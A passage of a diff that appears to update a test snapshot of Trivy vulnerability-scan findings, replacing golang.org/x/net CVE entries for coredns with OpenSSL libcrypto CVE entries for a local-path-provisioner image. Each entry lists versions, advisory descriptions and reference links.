"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "value": "https://security.gentoo.org/glsa/202209-02", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0356", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + "value": "https://security.netapp.com/advisory/ntap-20211022-0003/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "value": "https://ubuntu.com/security/notices/USN-5051-1", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20211209124913-491a49abca63", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-44716", - "installedVersion": "v0.0.0-20210614182718-04defd469f4e", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-44716", - "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", - "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", - "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", - "https://github.com/golang/go/issues/50058", - "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", - "https://go.dev/cl/369794", - "https://go.dev/issue/50058", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", - "https://linux.oracle.com/cve/CVE-2021-44716.html", - "https://linux.oracle.com/errata/ELSA-2022-0001.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", - "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", - "https://pkg.go.dev/vuln/GO-2022-0288", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220121-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-44716", - ], - }, - "category": "Vulnerability", - "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "golang: net/http: limit growth of header canonicalization cache", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-44716", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3711", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-44716", + "value": "https://www.debian.org/security/2021/dsa-4963", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "value": "https://www.openssl.org/news/secadv/20210824.txt", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/50058", + "value": "https://www.tenable.com/security/tns-2021-16", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "value": "https://www.tenable.com/security/tns-2022-02", }, - { - "type": "URL", - "value": "https://go.dev/cl/369794", + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1j-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-23840", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-23840", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "https://github.com/advisories/GHSA-qgm6-9472-pwq7", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "https://linux.oracle.com/cve/CVE-2021-23840.html", + "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", + "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210219-0009/", + "https://ubuntu.com/security/notices/USN-4738-1", + "https://ubuntu.com/security/notices/USN-5088-1", + "https://www.cve.org/CVERecord?id=CVE-2021-23840", + "https://www.debian.org/security/2021/dsa-4855", + "https://www.openssl.org/news/secadv/20210216.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-03", + "https://www.tenable.com/security/tns-2021-09", + "https://www.tenable.com/security/tns-2021-10", + ], + }, + "category": "Vulnerability", + "description": "Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "openssl: integer overflow in CipherUpdate", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-23840", }, { "type": "URL", - "value": "https://go.dev/issue/50058", + "value": "https://access.redhat.com/security/cve/CVE-2021-23840", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "value": "https://github.com/advisories/GHSA-qgm6-9472-pwq7", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "value": "https://linux.oracle.com/cve/CVE-2021-23840.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0288", + "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", + }, + { + "type": "URL", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202103-03", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4738-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5088-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-23840", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2021/dsa-4855", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20210216.txt", + }, + { + "type": "URL", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-03", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-10", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20210614182718-04defd469f4e", - "packageName": "golang.org/x/net", + "fixedVersion": "1.1.1k-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-3450", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "https://access.redhat.com/security/cve/CVE-2021-3450", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b", + "https://github.com/advisories/GHSA-8hfj-xrj2-pm22", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "https://linux.oracle.com/cve/CVE-2021-3450.html", + "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3450", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "https://rustsec.org/advisories/RUSTSEC-2021-0056.html", + "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210326-0006/", + "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "https://www.cve.org/CVERecord?id=CVE-2021-3450", + "https://www.openssl.org/news/secadv/20210325.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-05", + "https://www.tenable.com/security/tns-2021-08", + "https://www.tenable.com/security/tns-2021-09", ], }, "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a "purpose" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named "purpose" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL versions 1.1.1h and newer are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", + "name": "openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://avd.aquasec.com/nvd/cve-2021-3450", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://access.redhat.com/security/cve/CVE-2021-3450", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://github.com/advisories/GHSA-8hfj-xrj2-pm22", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://linux.oracle.com/cve/CVE-2021-3450.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3450", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0056.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3450", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://www.openssl.org/news/secadv/20210325.txt", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://www.tenable.com/security/tns-2021-05", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://www.tenable.com/security/tns-2021-08", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://www.tenable.com/security/tns-2021-09", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1l-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-3712", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", + "https://access.redhat.com/security/cve/CVE-2021-3712", + "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", + "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "https://linux.oracle.com/cve/CVE-2021-3712.html", + "https://linux.oracle.com/errata/ELSA-2022-9023.html", + "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", + "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", + "https://security.gentoo.org/glsa/202209-02", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20210827-0010/", + "https://ubuntu.com/security/notices/USN-5051-1", + "https://ubuntu.com/security/notices/USN-5051-2", + "https://ubuntu.com/security/notices/USN-5051-3", + "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", + "https://ubuntu.com/security/notices/USN-5088-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3712", + "https://www.debian.org/security/2021/dsa-4963", + "https://www.openssl.org/news/secadv/20210824.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-16", + "https://www.tenable.com/security/tns-2022-02", + ], + }, + "category": "Vulnerability", + "description": "ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "openssl: Read buffer overruns processing ASN.1 strings", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://avd.aquasec.com/nvd/cve-2021-3712", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://access.redhat.com/security/cve/CVE-2021-3712", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://linux.oracle.com/cve/CVE-2021-3712.html", }, { "type": "URL", - "value": 